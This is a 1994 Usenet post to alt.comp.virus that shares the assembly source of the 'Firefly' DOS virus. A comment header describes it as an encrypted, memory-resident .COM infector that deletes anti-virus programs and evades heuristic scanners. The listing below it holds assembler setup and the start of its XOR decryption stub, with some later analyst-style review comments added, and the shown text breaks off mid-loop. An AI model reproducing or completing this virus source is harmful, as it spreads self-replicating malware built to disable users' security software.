|
From netcom.com!ix.netcom.com!howland.reston.ans.net!cs.utexas.edu!geraldo.cc.utexas.edu!axpvms.cc.utexas.edu!HALFLIFE Tue Nov 29 09:56:01 1994
|
||
|
Xref: netcom.com alt.comp.virus:491
|
||
|
Path: netcom.com!ix.netcom.com!howland.reston.ans.net!cs.utexas.edu!geraldo.cc.utexas.edu!axpvms.cc.utexas.edu!HALFLIFE
|
||
|
From: halflife@axpvms.cc.utexas.edu
|
||
|
Newsgroups: alt.comp.virus
|
||
|
Subject: Firefly virus
|
||
|
Date: 28 Nov 1994 08:51:37 GMT
|
||
|
Organization: University of Texas @ Austin
|
||
|
Lines: 61
|
||
|
Message-ID: <3bc5mq$p63@geraldo.cc.utexas.edu>
|
||
|
Reply-To: halflife@axpvms.cc.utexas.edu
|
||
|
NNTP-Posting-Host: axpvms.cc.utexas.edu
|
||
|
|
||
|
;FIREFLY virus, by Nikademus.
|
||
|
;
|
||
|
;Firefly is an encrypted, memory resident virus which infects
|
||
|
;.COM files on load. It incorporates code from Proto-T,
|
||
|
;LokJaw and YB-X viruses and, when in memory, attacks a large selection
|
||
|
;of anti-virus programs as they are executed. Anti-virus programs
|
||
|
;identified by Firefly's execute/load handler are deleted.
|
||
|
;Firefly incorporates simple code from previous issues of the newsletter
|
||
|
;designed to de-install generic VSAFE resident virus activity
|
||
|
;filters designed for Microsoft by Central Point Software. It
|
||
|
;contains instructions - specifically a segment of pseudo-nested
|
||
|
;loops - which spoof F-Protect's expert system generic virus
|
||
|
;identification feature.
|
||
|
;
|
||
|
;FIREFLY also includes a visual marker tied to the system timer
|
||
|
;tick interrupt (1Ch) which slowly cycles the NumLock, CapsLock
|
||
|
;and ScrollLock LEDs on the keyboard. This produces a noticeable
|
||
|
;twinkling effect when the virus is active on a machine.
|
||
|
;
|
||
|
;Anti-anti-virus measures used by Firefly vary in effectiveness
|
||
|
;dependent upon how a user employs software. For example, while
|
||
|
;Firefly is designed to delete the Victor Charlie anti-virus
|
||
|
;shell, VC.EXE, a user who employs the software package's utilities
|
||
|
;for generic virus detection singly, will not be interfered with
|
||
|
;by the virus. Your results may vary, but the virus does effectively
|
||
|
;delete anti-virus programs while in memory unless steps are taken
|
||
|
;beforehand to avoid this.
|
||
|
;
|
||
|
;Firefly incorporates minor code armoring techniques designed to thwart
|
||
|
;trivial debugging.
|
||
|
|
||
|
|
||
|
|
||
|
; Assembler setup and size constants used by the stub at `start`.
; NOTE(review): the page labels this file NASM, but .radix / segment /
; assume / offset are MASM/TASM-style directives; read the listing with
; that syntax family in mind.
;
; Unsuffixed numeric literals are hexadecimal from this point on.
.radix 16
|
||
|
code segment
|
||
|
model small
|
||
|
; CS, DS and ES are all assumed to address the single `code` segment.
assume cs:code, ds:code, es:code
|
||
|
|
||
|
; .COM image layout: code begins at offset 100h, after the 100h-byte PSP.
org 100h
|
||
|
|
||
|
; Byte distance from `start` to `last` (`last` is defined outside this excerpt).
len equ offset last - start
|
||
|
; NOTE(review): with .radix 16 in effect some assemblers read a trailing `d`
; as a hex digit rather than a decimal suffix - confirm what `16d` evaluates
; to before trusting this paragraph count during analysis.
vir_len equ len / 16d ; 16 bytes per paragraph
|
||
|
; Pass count for the loop at `start`: it is loaded into CX there, and each
; pass XORs two words and advances BX by 4. `begin` and `last` lie outside
; this excerpt.
; Analysis note: the header describes the body as encrypted, so only the
; short stub at `start` appears in clear text on disk; the two key words are
; presumably rewritten per copy (TODO confirm in the infection routine), so
; a static signature should treat them as wildcards.
encryptlength equ (last - begin)/4+1
|
||
|
|
||
|
|
||
|
|
||
|
start:
|
||
|
mov bx, offset begin ; The Encryption Head
|
||
|
mov cx, encryptlength ;
|
||
|
encryption_loop: ;
|
||
|
db 81h ; XOR WORD PTR [BX], ????h
|
||
|
db 37h ;
|
||
|
encryption_value_1: ;
|
||
|
dw 0000h ;
|
||
|
;
|
||
|
db 81h ; XOR WORD PTR [BX+2], ????h
|
||
|
db 77h ;
|
||
|
db 02h ; 2 different random words
|
||
|
encryption_value_2: ; give 32-bit encryption
|
||
|
dw 0000h ;
|
||
|
add bx, 4 ;
|
||
|
|